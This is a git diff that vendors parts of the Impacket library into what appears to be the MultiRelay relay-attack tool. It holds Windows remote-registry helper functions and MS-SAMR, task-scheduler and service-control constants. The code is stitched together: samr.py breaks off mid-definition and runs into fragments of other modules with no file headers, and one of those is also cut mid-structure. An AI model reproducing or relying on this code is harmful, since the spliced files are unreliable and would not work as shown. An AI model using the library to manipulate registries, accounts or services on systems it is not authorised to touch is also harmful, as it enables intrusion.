+ request['samDesired'] = samDesired
+ return dce.request(request)
+
+def hOpenUsers(dce, samDesired = MAXIMUM_ALLOWED):
+ request = OpenUsers()
+ request['ServerName'] = NULL
+ request['samDesired'] = samDesired
+ return dce.request(request)
+
+def hBaseRegCloseKey(dce, hKey):
+ request = BaseRegCloseKey()
+ request['hKey'] = hKey
+ return dce.request(request)
+
+def hBaseRegCreateKey(dce, hKey, lpSubKey, lpClass = NULL, dwOptions = 0x00000001, samDesired = MAXIMUM_ALLOWED, lpSecurityAttributes = NULL, lpdwDisposition = REG_CREATED_NEW_KEY):
+ request = BaseRegCreateKey()
+ request['hKey'] = hKey
+ request['lpSubKey'] = checkNullString(lpSubKey)
+ request['lpClass'] = checkNullString(lpClass)
+ request['dwOptions'] = dwOptions
+ request['samDesired'] = samDesired
+ if lpSecurityAttributes == NULL:
+ request['lpSecurityAttributes']['RpcSecurityDescriptor']['lpSecurityDescriptor'] = NULL
+ else:
+ request['lpSecurityAttributes'] = lpSecurityAttributes
+ request['lpdwDisposition'] = lpdwDisposition
+
+ return dce.request(request)
+
+def hBaseRegDeleteKey(dce, hKey, lpSubKey):
+ request = BaseRegDeleteKey()
+ request['hKey'] = hKey
+ request['lpSubKey'] = checkNullString(lpSubKey)
+ return dce.request(request)
+
+def hBaseRegEnumKey(dce, hKey, dwIndex, lpftLastWriteTime = NULL):
+ request = BaseRegEnumKey()
+ request['hKey'] = hKey
+ request['dwIndex'] = dwIndex
+ request.fields['lpNameIn'].fields['MaximumLength'] = 1024
+ request.fields['lpNameIn'].fields['Data'].fields['Data'].fields['MaximumCount'] = 1024//2
+ request['lpClassIn'] = ' '* 64
+ request['lpftLastWriteTime'] = lpftLastWriteTime
+
+ return dce.request(request)
+
+def hBaseRegEnumValue(dce, hKey, dwIndex, dataLen=256):
+ request = BaseRegEnumValue()
+ request['hKey'] = hKey
+ request['dwIndex'] = dwIndex
+ retries = 1
+
+ # We need to be aware the size might not be enough, so let's catch ERROR_MORE_DATA exception
+ while True:
+ try:
+ # Only the maximum length field of the lpValueNameIn is used to determine the buffer length to be allocated
+ # by the service. Specify a string with a zero length but maximum length set to the largest buffer size
+ # needed to hold the value names.
+ request.fields['lpValueNameIn'].fields['MaximumLength'] = dataLen*2
+ request.fields['lpValueNameIn'].fields['Data'].fields['Data'].fields['MaximumCount'] = dataLen
+
+ request['lpData'] = b' ' * dataLen
+ request['lpcbData'] = dataLen
+ request['lpcbLen'] = dataLen
+ resp = dce.request(request)
+ except DCERPCSessionError as e:
+ if retries > 1:
+ LOG.debug('Too many retries when calling hBaseRegEnumValue, aborting')
+ raise
+ if e.get_error_code() == system_errors.ERROR_MORE_DATA:
+ # We need to adjust the size
+ retries +=1
+ dataLen = e.get_packet()['lpcbData']
+ continue
+ else:
+ raise
+ else:
+ break
+
+ return resp
+
+def hBaseRegFlushKey(dce, hKey):
+ request = BaseRegFlushKey()
+ request['hKey'] = hKey
+ return dce.request(request)
+
+def hBaseRegGetKeySecurity(dce, hKey, securityInformation = OWNER_SECURITY_INFORMATION ):
+ request = BaseRegGetKeySecurity()
+ request['hKey'] = hKey
+ request['SecurityInformation'] = securityInformation
+ request['pRpcSecurityDescriptorIn']['lpSecurityDescriptor'] = NULL
+ request['pRpcSecurityDescriptorIn']['cbInSecurityDescriptor'] = 1024
+
+ return dce.request(request)
+
+def hBaseRegLoadKey(dce, hKey, lpSubKey, lpFile):
+ request = BaseRegLoadKey()
+ request['hKey'] = hKey
+ request['lpSubKey'] = checkNullString(lpSubKey)
+ request['lpFile'] = checkNullString(lpFile)
+ return dce.request(request)
+
+def hBaseRegUnLoadKey(dce, hKey, lpSubKey):
+ request = BaseRegUnLoadKey()
+ request['hKey'] = hKey
+ request['lpSubKey'] = checkNullString(lpSubKey)
+ return dce.request(request)
+
+def hBaseRegOpenKey(dce, hKey, lpSubKey, dwOptions=0x00000001, samDesired = MAXIMUM_ALLOWED):
+ request = BaseRegOpenKey()
+ request['hKey'] = hKey
+ request['lpSubKey'] = checkNullString(lpSubKey)
+ request['dwOptions'] = dwOptions
+ request['samDesired'] = samDesired
+ return dce.request(request)
+
+def hBaseRegQueryInfoKey(dce, hKey):
+ request = BaseRegQueryInfoKey()
+ request['hKey'] = hKey
+ # Not the cleanest way, but oh well
+ # Plus, Windows XP needs MaximumCount also set
+ request.fields['lpClassIn'].fields['MaximumLength'] = 1024
+ request.fields['lpClassIn'].fields['Data'].fields['Data'].fields['MaximumCount'] = 1024//2
+ return dce.request(request)
+
+def hBaseRegQueryValue(dce, hKey, lpValueName, dataLen=512):
+ request = BaseRegQueryValue()
+ request['hKey'] = hKey
+ request['lpValueName'] = checkNullString(lpValueName)
+ retries = 1
+
+ # We need to be aware the size might not be enough, so let's catch ERROR_MORE_DATA exception
+ while True:
+ try:
+ request['lpData'] =b' ' * dataLen
+ request['lpcbData'] = dataLen
+ request['lpcbLen'] = dataLen
+ resp = dce.request(request)
+ except DCERPCSessionError as e:
+ if retries > 1:
+ LOG.debug('Too many retries when calling hBaseRegQueryValue, aborting')
+ raise
+ if e.get_error_code() == system_errors.ERROR_MORE_DATA:
+ # We need to adjust the size
+ dataLen = e.get_packet()['lpcbData']
+ continue
+ else:
+ raise
+ else:
+ break
+
+ # Returns
+ # ( dataType, data )
+ return resp['lpType'], unpackValue(resp['lpType'], resp['lpData'])
+
+def hBaseRegReplaceKey(dce, hKey, lpSubKey, lpNewFile, lpOldFile):
+ request = BaseRegReplaceKey()
+ request['hKey'] = hKey
+ request['lpSubKey'] = checkNullString(lpSubKey)
+ request['lpNewFile'] = checkNullString(lpNewFile)
+ request['lpOldFile'] = checkNullString(lpOldFile)
+ return dce.request(request)
+
+def hBaseRegRestoreKey(dce, hKey, lpFile, flags=REG_REFRESH_HIVE):
+ request = BaseRegRestoreKey()
+ request['hKey'] = hKey
+ request['lpFile'] = checkNullString(lpFile)
+ request['Flags'] = flags
+ return dce.request(request)
+
+def hBaseRegSaveKey(dce, hKey, lpFile, pSecurityAttributes = NULL):
+ request = BaseRegSaveKey()
+ request['hKey'] = hKey
+ request['lpFile'] = checkNullString(lpFile)
+ request['pSecurityAttributes'] = pSecurityAttributes
+ return dce.request(request)
+
+def hBaseRegSetValue(dce, hKey, lpValueName, dwType, lpData):
+ request = BaseRegSetValue()
+ request['hKey'] = hKey
+ request['lpValueName'] = checkNullString(lpValueName)
+ request['dwType'] = dwType
+ request['lpData'] = packValue(dwType,lpData)
+ request['cbData'] = len(request['lpData'])
+ return dce.request(request)
+
+def hBaseRegGetVersion(dce, hKey):
+ request = BaseRegGetVersion()
+ request['hKey'] = hKey
+ return dce.request(request)
+
+def hOpenCurrentConfig(dce, samDesired = MAXIMUM_ALLOWED):
+ request = OpenCurrentConfig()
+ request['ServerName'] = NULL
+ request['samDesired'] = samDesired
+ return dce.request(request)
+
+def hBaseRegQueryMultipleValues(dce, hKey, val_listIn):
+ # ToDo, check the result to see whether we need to
+ # have a bigger buffer for the data to receive
+ request = BaseRegQueryMultipleValues()
+ request['hKey'] = hKey
+
+ for item in val_listIn:
+ itemn = RVALENT()
+ itemn['ve_valuename'] = checkNullString(item['ValueName'])
+ itemn['ve_valuelen'] = len(itemn['ve_valuename'])
+ itemn['ve_valueptr'] = NULL
+ itemn['ve_type'] = item['ValueType']
+ request['val_listIn'].append(itemn)
+
+ request['num_vals'] = len(request['val_listIn'])
+ request['lpvalueBuf'] = list(b' '*128)
+ request['ldwTotsize'] = 128
+
+ resp = dce.request(request)
+ retVal = list()
+ for item in resp['val_listOut']:
+ itemn = dict()
+ itemn['ValueName'] = item['ve_valuename']
+ itemn['ValueData'] = unpackValue(item['ve_type'], resp['lpvalueBuf'][item['ve_valueptr'] : item['ve_valueptr']+item['ve_valuelen']])
+ retVal.append(itemn)
+
+ return retVal
+
+def hBaseRegSaveKeyEx(dce, hKey, lpFile, pSecurityAttributes = NULL, flags=1):
+ request = BaseRegSaveKeyEx()
+ request['hKey'] = hKey
+ request['lpFile'] = checkNullString(lpFile)
+ request['pSecurityAttributes'] = pSecurityAttributes
+ request['Flags'] = flags
+ return dce.request(request)
+
+def hOpenPerformanceText(dce, samDesired = MAXIMUM_ALLOWED):
+ request = OpenPerformanceText()
+ request['ServerName'] = NULL
+ request['samDesired'] = samDesired
+ return dce.request(request)
+
+def hOpenPerformanceNlsText(dce, samDesired = MAXIMUM_ALLOWED):
+ request = OpenPerformanceNlsText()
+ request['ServerName'] = NULL
+ request['samDesired'] = samDesired
+ return dce.request(request)
+
+def hBaseRegDeleteValue(dce, hKey, lpValueName):
+ request = BaseRegDeleteValue()
+ request['hKey'] = hKey
+ request['lpValueName'] = checkNullString(lpValueName)
+ return dce.request(request)
diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/samr.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/samr.py
new file mode 100644
index 0000000..e4dc61b
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/samr.py
@@ -0,0 +1,2929 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+# [MS-SAMR] Interface implementation
+#
+# Best way to learn how to use these calls is to grab the protocol standard
+# so you understand what the call does, and then read the test case located
+# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+# Some calls have helper functions, which makes it even easier to use.
+# They are located at the end of this file.
+# Helper functions start with "h".
+# There are test cases for them too.
+#
+from __future__ import division
+from __future__ import print_function
+from binascii import unhexlify
+
+from impacket.dcerpc.v5.ndr import NDRCALL, NDR, NDRSTRUCT, NDRUNION, NDRPOINTER, NDRUniConformantArray, \
+ NDRUniConformantVaryingArray, NDRENUM
+from impacket.dcerpc.v5.dtypes import NULL, RPC_UNICODE_STRING, ULONG, USHORT, UCHAR, LARGE_INTEGER, RPC_SID, LONG, STR, \
+ LPBYTE, SECURITY_INFORMATION, PRPC_SID, PRPC_UNICODE_STRING, LPWSTR
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket import nt_errors, LOG
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.enum import Enum
+from impacket.structure import Structure
+
+import struct
+import os
+from hashlib import md5
+from Cryptodome.Cipher import ARC4
+
+MSRPC_UUID_SAMR = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AC', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ key = self.error_code
+ if key in nt_errors.ERROR_MESSAGES:
+ error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1]
+ return 'SAMR SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'SAMR SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+PSAMPR_SERVER_NAME = LPWSTR
+# 2.2.1.1 Common ACCESS_MASK Values
+DELETE = 0x00010000
+READ_CONTROL = 0x00020000
+WRITE_DAC = 0x00040000
+WRITE_OWNER = 0x00080000
+ACCESS_SYSTEM_SECURITY = 0x01000000
+MAXIMUM_ALLOWED = 0x02000000
+
+# 2.2.1.2 Generic ACCESS_MASK Values
+GENERIC_READ = 0x80000000
+GENERIC_WRITE = 0x40000000
+GENERIC_EXECUTE = 0x20000000
+GENERIC_ALL = 0x10000000
+
+# 2.2.1.3 Server ACCESS_MASK Values
+SAM_SERVER_CONNECT = 0x00000001
+SAM_SERVER_SHUTDOWN = 0x00000002
+SAM_SERVER_INITIALIZE = 0x00000004
+SAM_SERVER_CREATE_DOMAIN = 0x00000008
+SAM_SERVER_ENUMERATE_DOMAINS = 0x00000010
+SAM_SERVER_LOOKUP_DOMAIN = 0x00000020
+SAM_SERVER_ALL_ACCESS = 0x000F003F
+SAM_SERVER_READ = 0x00020010
+SAM_SERVER_WRITE = 0x0002000E
+SAM_SERVER_EXECUTE = 0x00020021
+
+# 2.2.1.4 Domain ACCESS_MASK Values
+DOMAIN_READ_PASSWORD_PARAMETERS = 0x00000001
+DOMAIN_WRITE_PASSWORD_PARAMS = 0x00000002
+DOMAIN_READ_OTHER_PARAMETERS = 0x00000004
+DOMAIN_WRITE_OTHER_PARAMETERS = 0x00000008
+DOMAIN_CREATE_USER = 0x00000010
+DOMAIN_CREATE_GROUP = 0x00000020
+DOMAIN_CREATE_ALIAS = 0x00000040
+DOMAIN_GET_ALIAS_MEMBERSHIP = 0x00000080
+DOMAIN_LIST_ACCOUNTS = 0x00000100
+DOMAIN_LOOKUP = 0x00000200
+DOMAIN_ADMINISTER_SERVER = 0x00000400
+DOMAIN_ALL_ACCESS = 0x000F07FF
+DOMAIN_READ = 0x00020084
+DOMAIN_WRITE = 0x0002047A
+DOMAIN_EXECUTE = 0x00020301
+
+# 2.2.1.5 Group ACCESS_MASK Values
+GROUP_READ_INFORMATION = 0x00000001
+GROUP_WRITE_ACCOUNT = 0x00000002
+GROUP_ADD_MEMBER = 0x00000004
+GROUP_REMOVE_MEMBER = 0x00000008
+GROUP_LIST_MEMBERS = 0x00000010
+GROUP_ALL_ACCESS = 0x000F001F
+GROUP_READ = 0x00020010
+GROUP_WRITE = 0x0002000E
+GROUP_EXECUTE = 0x00020001
+
+# 2.2.1.6 Alias ACCESS_MASK Values
+ALIAS_ADD_MEMBER = 0x00000001
+ALIAS_REMOVE_MEMBER = 0x00000002
+ALIAS_LIST_MEMBERS = 0x00000004
+ALIAS_READ_INFORMATION = 0x00000008
+ALIAS_WRITE_ACCOUNT = 0x00000010
+ALIAS_ALL_ACCESS = 0x000F001F
+ALIAS_READ = 0x00020004
+ALIAS_WRITE = 0x00020013
+ALIAS_EXECUTE = 0x00020008
+
+# 2.2.1.7 User ACCESS_MASK Values
+USER_READ_GENERAL = 0x00000001
+USER_READ_PREFERENCES = 0x00000002
+USER_WRITE_PREFERENCES = 0x00000004
+USER_READ_LOGON = 0x00000008
+USER_READ_ACCOUNT = 0x00000010
+USER_WRITE_ACCOUNT = 0x00000020
+USER_CHANGE_PASSWORD = 0x00000040
+USER_FORCE_PASSWORD_CHANGE = 0x00000080
+USER_LIST_GROUPS = 0x00000100
+USER_READ_GROUP_INFORMATION = 0x00000200
+USER_WRITE_GROUP_INFORMATION = 0x00000400
+USER_ALL_ACCESS = 0x000F07FF
+USER_READ = 0x0002031A
+USER_WRITE = 0x00020044
+USER_EXECUTE = 0x00020041
+
+# 2.2.1.8 USER_ALL Values
+USER_ALL_USERNAME = 0x00000001
+USER_ALL_FULLNAME = 0x00000002
+USER_ALL_USERID = 0x00000004
+USER_ALL_PRIMARYGROUPID = 0x00000008
+USER_ALL_ADMINCOMMENT = 0x00000010
+USER_ALL_USERCOMMENT = 0x00000020
+USER_ALL_HOMEDIRECTORY = 0x00000040
+USER_ALL_HOMEDIRECTORYDRIVE = 0x00000080
+USER_ALL_SCRIPTPATH = 0x00000100
+USER_ALL_PROFILEPATH = 0x00000200
+USER_ALL_WORKSTATIONS = 0x00000400
+USER_ALL_LASTLOGON = 0x00000800
+USER_ALL_LASTLOGOFF = 0x00001000
+USER_ALL_LOGONHOURS = 0x00002000
+USER_ALL_BADPASSWORDCOUNT = 0x00004000
+USER_ALL_LOGONCOUNT = 0x00008000
+USER_ALL_PASSWORDCANCHANGE = 0x00010000
+USER_ALL_PASSWORDMUSTCHANGE = 0x00020000
+USER_ALL_PASSWORDLASTSET = 0x00040000
+USER_ALL_ACCOUNTEXPIRES = 0x00080000
+USER_ALL_USERACCOUNTCONTROL = 0x00100000
+USER_ALL_PARAMETERS = 0x00200000
+USER_ALL_COUNTRYCODE = 0x00400000
+USER_ALL_CODEPAGE = 0x00800000
+USER_ALL_NTPASSWORDPRESENT = 0x01000000
+USER_ALL_LMPASSWORDPRESENT = 0x02000000
+USER_ALL_PRIVATEDATA = 0x04000000
+USER_ALL_PASSWORDEXPIRED = 0x08000000
+USER_ALL_SECURITYDESCRIPTOR = 0x10000000
+USER_ALL_UNDEFINED_MASK = 0xC0000000
+
+# 2.2.1.9 ACCOUNT_TYPE Values
+SAM_DOMAIN_OBJECT = 0x00000000
+SAM_GROUP_OBJECT = 0x10000000
+SAM_NON_SECURITY_GROUP_OBJECT = 0x10000001
+SAM_ALIAS_OBJECT = 0x20000000
+SAM_NON_SECURITY_ALIAS_OBJECT = 0x20000001
+SAM_USER_OBJECT = 0x30000000
+SAM_MACHINE_ACCOUNT = 0x30000001
+SAM_TRUST_ACCOUNT = 0x30000002
+SAM_APP_BASIC_GROUP = 0x40000000
+SAM_APP_QUERY_GROUP = 0x40000001
+
+# 2.2.1.10 SE_GROUP Attributes
+SE_GROUP_MANDATORY = 0x00000001
+SE_GROUP_ENABLED_BY_DEFAULT = 0x00000002
+SE_GROUP_ENABLED = 0x00000004
+
+# 2.2.1.11 GROUP_TYPE Codes
+GROUP_TYPE_ACCOUNT_GROUP = 0x00000002
+GROUP_TYPE_RESOURCE_GROUP = 0x00000004
+GROUP_TYPE_UNIVERSAL_GROUP = 0x00000008
+GROUP_TYPE_SECURITY_ENABLED = 0x80000000
+GROUP_TYPE_SECURITY_ACCOUNT = 0x80000002
+GROUP_TYPE_SECURITY_RESOURCE = 0x80000004
+GROUP_TYPE_SECURITY_UNIVERSAL = 0x80000008
+
+# 2.2.1.12 USER_ACCOUNT Codes
+USER_ACCOUNT_DISABLED = 0x00000001
+USER_HOME_DIRECTORY_REQUIRED = 0x00000002
+USER_PASSWORD_NOT_REQUIRED = 0x00000004
+USER_TEMP_DUPLICATE_ACCOUNT = 0x00000008
+USER_NORMAL_ACCOUNT = 0x00000010
+USER_MNS_LOGON_ACCOUNT = 0x00000020
+USER_INTERDOMAIN_TRUST_ACCOUNT = 0x00000040
+USER_WORKSTATION_TRUST_ACCOUNT = 0x00000080
+USER_SERVER_TRUST_ACCOUNT = 0x00000100
+USER_DONT_EXPIRE_PASSWORD = 0x00000200
+USER_ACCOUNT_AUTO_LOCKED = 0x00000400
+USER_ENCRYPTED_TEXT_PASSWORD_ALLOWED = 0x00000800
+USER_SMARTCARD_REQUIRED = 0x00001000
+USER_TRUSTED_FOR_DELEGATION = 0x00002000
+USER_NOT_DELEGATED = 0x00004000
+USER_USE_DES_KEY_ONLY = 0x00008000
+USER_DONT_REQUIRE_PREAUTH = 0x00010000
+USER_PASSWORD_EXPIRED = 0x00020000
+USER_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION = 0x00040000
+USER_NO_AUTH_DATA_REQUIRED = 0x00080000
+USER_PARTIAL_SECRETS_ACCOUNT = 0x00100000
+USER_USE_AES_KEYS = 0x00200000
+
+# 2.2.1.13 UF_FLAG Codes
+UF_SCRIPT = 0x00000001
+UF_ACCOUNTDISABLE = 0x00000002
+UF_HOMEDIR_REQUIRED = 0x00000008
+UF_LOCKOUT = 0x00000010
+UF_PASSWD_NOTREQD = 0x00000020
+UF_PASSWD_CANT_CHANGE = 0x00000040
+UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED = 0x00000080
+UF_TEMP_DUPLICATE_ACCOUNT = 0x00000100
+UF_NORMAL_ACCOUNT = 0x00000200
+UF_INTERDOMAIN_TRUST_ACCOUNT = 0x00000800
+UF_WORKSTATION_TRUST_ACCOUNT = 0x00001000
+UF_SERVER_TRUST_ACCOUNT = 0x00002000
+UF_DONT_EXPIRE_PASSWD = 0x00010000
+UF_MNS_LOGON_ACCOUNT = 0x00020000
+UF_SMARTCARD_REQUIRED = 0x00040000
+UF_TRUSTED_FOR_DELEGATION = 0x00080000
+UF_NOT_DELEGATED = 0x00100000
+UF_USE_DES_KEY_ONLY = 0x00200000
+UF_DONT_REQUIRE_PREAUTH = 0x00400000
+UF_PASSWORD_EXPIRED = 0x00800000
+UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION = 0x01000000
+UF_NO_AUTH_DATA_REQUIRED = 0x02000000
+UF_PARTIAL_SECRETS_ACCOUNT = 0x04000000
+UF_USE_AES_KEYS = 0x08000000
+
+# 2.2.1.14 Predefined RIDs
+DOMAIN_USER_RID_ADMIN = 0x000001F4
+DOMAIN_USER_RID_GUEST = 0x000001F5
+DOMAIN_USER_RID_KRBTGT = 0x000001F6
+DOMAIN_GROUP_RID_ADMINS = 0x00000200
+DOMAIN_GROUP_RID_USERS = 0x00000201
+DOMAIN_GROUP_RID_COMPUTERS = 0x00000203
+DOMAIN_GROUP_RID_CONTROLLERS = 0x00000204
+DOMAIN_ALIAS_RID_ADMINS = 0x00000220
+DOMAIN_GROUP_RID_READONLY_CONTROLLERS = 0x00000209
+
+# 2.2.4.1 Domain Fields
+DOMAIN_PASSWORD_COMPLEX = 0x00000001
+DOMAIN_PASSWORD_NO_ANON_CHANGE = 0x00000002
+DOMAIN_PASSWORD_NO_CLEAR_CHANGE = 0x00000004
+DOMAIN_LOCKOUT_ADMINS = 0x00000008
+DOMAIN_PASSWORD_STORE_CLEARTEXT = 0x00000010
+DOMAIN_REFUSE_PASSWORD_CHANGE = 0x00000020
+
+# 2.2.9.2 SAM_VALIDATE_PERSISTED_FIELDS PresentFields
+SAM_VALIDATE_PASSWORD_LAST_SET = 0x00000001
+SAM_VALIDATE_BAD_PASSWORD_TIME = 0x00000002
+SAM_VALIDATE_LOCKOUT_TIME = 0x00000004
+SAM_VALIDATE_BAD_PASSWORD_COUNT = 0x00000008
+SAM_VALIDATE_PASSWORD_HISTORY_LENGTH = 0x00000010
+SAM_VALIDATE_PASSWORD_HISTORY = 0x00000020
+
+################################################################################
+# STRUCTURES
+################################################################################
+class RPC_UNICODE_STRING_ARRAY(NDRUniConformantVaryingArray):
+ item = RPC_UNICODE_STRING
+
+class RPC_UNICODE_STRING_ARRAY_C(NDRUniConformantArray):
+ item = RPC_UNICODE_STRING
+
+class PRPC_UNICODE_STRING_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data',RPC_UNICODE_STRING_ARRAY_C),
+ )
+
+# 2.2.2.1 RPC_STRING, PRPC_STRING
+class RPC_STRING(NDRSTRUCT):
+ commonHdr = (
+ ('MaximumLength','.
+# There are test cases for them too.
+#
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, ULONG, WSTR, NULL
+from impacket import hresult_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_SASEC = uuidtup_to_bin(('378E52B0-C0A9-11CF-822D-00AA0051E40F','1.0'))
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ key = self.error_code
+ if key in hresult_errors.ERROR_MESSAGES:
+ error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+ return 'TSCH SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'TSCH SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+SASEC_HANDLE = WSTR
+PSASEC_HANDLE = LPWSTR
+
+MAX_BUFFER_SIZE = 273
+
+# 3.2.5.3.4 SASetAccountInformation (Opnum 0)
+TASK_FLAG_RUN_ONLY_IF_LOGGED_ON = 0x40000
+
+################################################################################
+# STRUCTURES
+################################################################################
+class WORD_ARRAY(NDRUniConformantArray):
+ item = '.
+# There are test cases for them too.
+#
+
+from impacket import system_errors
+from impacket.dcerpc.v5.dtypes import NULL, DWORD, LPWSTR, ULONG, BOOL, LPBYTE, ULONGLONG, PGUID, USHORT, LPDWORD, WSTR, \
+ GUID, PBOOL, WIDESTR
+from impacket.dcerpc.v5.ndr import NDRCALL, NDR, NDRSTRUCT, NDRPOINTER, NDRPOINTERNULL, NDRUniConformantArray, NDRUNION
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import uuidtup_to_bin
+
+MSRPC_UUID_SCMR = uuidtup_to_bin(('367ABB81-9844-35F1-AD32-98F038001003', '2.0'))
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ key = self.error_code
+ if key in system_errors.ERROR_MESSAGES:
+ error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
+ return 'SCMR SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'SCMR SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+# Access codes
+SERVICE_ALL_ACCESS = 0X000F01FF
+SERVICE_CHANGE_CONFIG = 0X00000002
+SERVICE_ENUMERATE_DEPENDENTS = 0X00000008
+SERVICE_INTERROGATE = 0X00000080
+SERVICE_PAUSE_CONTINUE = 0X00000040
+SERVICE_QUERY_CONFIG = 0X00000001
+SERVICE_QUERY_STATUS = 0X00000004
+SERVICE_START = 0X00000010
+SERVICE_STOP = 0X00000020
+SERVICE_USER_DEFINED_CTRL = 0X00000100
+SERVICE_SET_STATUS = 0X00008000
+
+# Specific Access for SCM
+SC_MANAGER_LOCK = 0x00000008
+SC_MANAGER_CREATE_SERVICE = 0x00000002
+SC_MANAGER_ENUMERATE_SERVICE = 0x00000004
+SC_MANAGER_CONNECT = 0x00000001
+SC_MANAGER_QUERY_LOCK_STATUS = 0x00000010
+SC_MANAGER_MODIFY_BOOT_CONFIG = 0x00000020
+
+# Service Types
+SERVICE_KERNEL_DRIVER = 0x00000001
+SERVICE_FILE_SYSTEM_DRIVER = 0x00000002
+SERVICE_WIN32_OWN_PROCESS = 0x00000010
+SERVICE_WIN32_SHARE_PROCESS = 0x00000020
+SERVICE_INTERACTIVE_PROCESS = 0x00000100
+SERVICE_NO_CHANGE = 0xffffffff
+
+# Start Types
+SERVICE_BOOT_START = 0x00000000
+SERVICE_SYSTEM_START = 0x00000001
+SERVICE_AUTO_START = 0x00000002
+SERVICE_DEMAND_START = 0x00000003
+SERVICE_DISABLED = 0x00000004
+SERVICE_NO_CHANGE = 0xffffffff
+
+# Error Control
+SERVICE_ERROR_IGNORE = 0x00000000
+SERVICE_ERROR_NORMAL = 0x00000001
+SERVICE_ERROR_SEVERE = 0x00000002
+SERVICE_ERROR_CRITICAL = 0x00000003
+SERVICE_NO_CHANGE = 0xffffffff
+
+# Service Control Codes
+SERVICE_CONTROL_CONTINUE = 0x00000003
+SERVICE_CONTROL_INTERROGATE = 0x00000004
+SERVICE_CONTROL_PARAMCHANGE = 0x00000006
+SERVICE_CONTROL_PAUSE = 0x00000002
+SERVICE_CONTROL_STOP = 0x00000001
+SERVICE_CONTROL_NETBINDADD = 0x00000007
+SERVICE_CONTROL_NETBINDREMOVE = 0x00000008
+SERVICE_CONTROL_NETBINDENABLE = 0x00000009
+SERVICE_CONTROL_NETBINDDISABLE= 0x0000000A
+
+# Service State
+SERVICE_ACTIVE = 0x00000001
+SERVICE_INACTIVE = 0x00000002
+SERVICE_STATE_ALL = 0x00000003
+
+# Current State
+SERVICE_CONTINUE_PENDING = 0x00000005
+SERVICE_PAUSE_PENDING = 0x00000006
+SERVICE_PAUSED = 0x00000007
+SERVICE_RUNNING = 0x00000004
+SERVICE_START_PENDING = 0x00000002
+SERVICE_STOP_PENDING = 0x00000003
+SERVICE_STOPPED = 0x00000001
+
+# Controls Accepted
+SERVICE_ACCEPT_PARAMCHANGE = 0x00000008
+SERVICE_ACCEPT_PAUSE_CONTINUE = 0x00000002
+SERVICE_ACCEPT_SHUTDOWN = 0x00000004
+SERVICE_ACCEPT_STOP = 0x00000001
+SERVICE_ACCEPT_HARDWAREPROFILECHANGE = 0x00000020
+SERVICE_ACCEPT_POWEREVENT = 0x00000040
+SERVICE_ACCEPT_SESSIONCHANGE = 0x00000080
+SERVICE_ACCEPT_PRESHUTDOWN = 0x00000100
+SERVICE_ACCEPT_TIMECHANGE = 0x00000200
+ERVICE_ACCEPT_TRIGGEREVENT = 0x00000400
+
+# Security Information
+DACL_SECURITY_INFORMATION = 0x4
+GROUP_SECURITY_INFORMATION = 0x2
+OWNER_SECURITY_INFORMATION = 0x1
+SACL_SECURITY_INFORMATION = 0x8
+
+# Service Config2 Info Levels
+SERVICE_CONFIG_DESCRIPTION = 0x00000001
+SERVICE_CONFIG_FAILURE_ACTIONS = 0x00000002
+SERVICE_CONFIG_DELAYED_AUTO_START_INFO = 0x00000003
+SERVICE_CONFIG_FAILURE_ACTIONS_FLAG = 0x00000004
+SERVICE_CONFIG_SERVICE_SID_INFO = 0x00000005
+SERVICE_CONFIG_REQUIRED_PRIVILEGES_INFO = 0x00000006
+SERVICE_CONFIG_PRESHUTDOWN_INFO = 0x00000007
+SERVICE_CONFIG_PREFERRED_NODE = 0x00000009
+SERVICE_CONFIG_RUNLEVEL_INFO = 0x0000000A
+
+# SC_ACTIONS Types
+SC_ACTION_NONE = 0
+SC_ACTION_RESTART = 1
+SC_ACTION_REBOOT = 2
+SC_ACTION_RUN_COMMAND = 3
+
+# SERVICE_SID_INFO types
+SERVICE_SID_TYPE_NONE = 0x00000000
+SERVICE_SID_TYPE_RESTRICTED = 0x00000003
+SERVICE_SID_TYPE_UNRESTRICTED = 0x00000001
+
+# SC_STATUS_TYPE types
